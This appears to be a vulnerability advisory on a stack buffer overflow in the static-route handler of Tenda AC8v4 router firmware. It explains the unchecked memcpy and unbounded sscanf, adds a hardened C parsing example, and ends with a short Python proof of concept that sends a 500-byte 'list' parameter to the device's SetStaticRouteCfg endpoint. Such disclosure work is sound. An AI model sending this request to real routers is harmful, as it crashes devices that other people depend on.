Overview

Affected version

AC8v4 V16.03.34.09

Vulnerability details

Tenda AC8v4 V16.03.34.09 has a stack overflow vulnerability in the fromSetRouteStatic function. This function reads the list parameter from a POST request into the variable iVar1.


Because the user controls the contents of auStack_414, the attacker-supplied data is copied with memcpy into the smaller buffer auStack_210 without a length check. The function route_static_check is then called with auStack_210 as its argument.


Inside route_static_check, local_58 = param1. The call sscanf(local_58, "%[^,],%[^,],%[^,],%s", &local_4c, &local_3c, &local_2c, local_1c); causes a stack buffer overflow: none of the %[^,] or %s conversions carries a width limit, so a user-supplied param1 longer than the local_4c array overruns it and triggers this vulnerability.
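The following C example, added here and not taken from the Tenda firmware, shows the hardened form of the parsing described above: the same four-field "dst,mask,gw,iface" format is read with width-limited sscanf conversions, a length gate is applied before any copy, and %n is used to reject entries that were only partially consumed. The 16-byte field size is an assumption made for this example (the decompiled locals local_4c, local_3c, local_2c and local_1c are 16 bytes apart); the struct, function and demo names are likewise hypothetical.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Field width assumed for this example: the decompiled locals local_4c,
 * local_3c, local_2c and local_1c sit 16 bytes apart, so 16-byte buffers
 * are a plausible reconstruction, not a value taken from the firmware. */
#define FIELD_LEN 16
/* A route entry can be at most four full fields plus three separators. */
#define MAX_LIST_LEN (4 * (FIELD_LEN - 1) + 3)

struct static_route {
    char dst[FIELD_LEN];
    char mask[FIELD_LEN];
    char gw[FIELD_LEN];
    char iface[FIELD_LEN];
};

/* Hardened replacement for the unbounded
 *   sscanf(p, "%[^,],%[^,],%[^,],%s", ...)
 * pattern seen in route_static_check. Every conversion carries a width of
 * FIELD_LEN-1 (15), so sscanf can never write past a field, and %n lets us
 * reject input that was only partially consumed instead of silently
 * truncating it. Returns true only for a well-formed, fully parsed entry. */
bool parse_static_route(const char *list, struct static_route *out)
{
    if (list == NULL || out == NULL)
        return false;
    /* Length gate first: the check that fromSetRouteStatic should perform
     * before memcpy'ing the request parameter into a smaller stack buffer. */
    if (strlen(list) > MAX_LIST_LEN)
        return false;

    memset(out, 0, sizeof *out);
    int consumed = 0;
    int n = sscanf(list, "%15[^,],%15[^,],%15[^,],%15s%n",
                   out->dst, out->mask, out->gw, out->iface, &consumed);
    /* n counts only the four stored conversions; %n is not counted.
     * Anything left after the last field means a field was too long. */
    return n == 4 && list[consumed] == '\0';
}

/* Constructed sample input: a normal static route entry. */
bool demo_accepts_well_formed(void)
{
    struct static_route r;
    return parse_static_route("192.168.1.0,255.255.255.0,192.168.1.1,eth0", &r)
        && strcmp(r.dst, "192.168.1.0") == 0 && strcmp(r.iface, "eth0") == 0;
}

/* The advisory's PoC sends 500 'a' bytes as the list parameter; the length
 * gate rejects it before sscanf ever runs. */
bool demo_rejects_oversized_list(void)
{
    char big[501];
    struct static_route r;
    memset(big, 'a', 500);
    big[500] = '\0';
    return !parse_static_route(big, &r);
}

/* A single over-long field inside an otherwise short entry is caught by the
 * width limit plus the %n completeness check. */
bool demo_rejects_overlong_field(void)
{
    struct static_route r;
    return !parse_static_route("10.0.0.0,255.0.0.0,10.0.0.1,interface_name_is_too_long", &r);
}

int main(void)
{
    printf("well-formed accepted:    %d\n", demo_accepts_well_formed());
    printf("oversized rejected:      %d\n", demo_rejects_oversized_list());
    printf("overlong field rejected: %d\n", demo_rejects_overlong_field());
    return 0;
}
```

The two checks are deliberately independent: the length gate protects the memcpy stage in the handler, while the per-conversion widths protect the sscanf stage in the checker, so removing either one would reopen one of the two overflow points the advisory describes.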


PoC

import requests
import urllib.parse

# Target device address as given in the original PoC
url = "http://192.168.1.100:80/goform/SetStaticRouteCfg"
# Oversized 'list' parameter, larger than the fixed stack buffers
data = {'list': 'a'*500}

# Build the form body manually so the payload is URL-encoded field by field
encoded_params = []
for k, v in data.items():
    k_encoded = urllib.parse.quote(k)
    v_encoded = urllib.parse.quote(v)
    encoded_params.append(f"{k_encoded}={v_encoded}")

post_data = "&".join(encoded_params)

response = requests.post(
    url,
    data=post_data,
    timeout=3
)

print("Status Code:", response.status_code)
print("Response Text:", response.text)
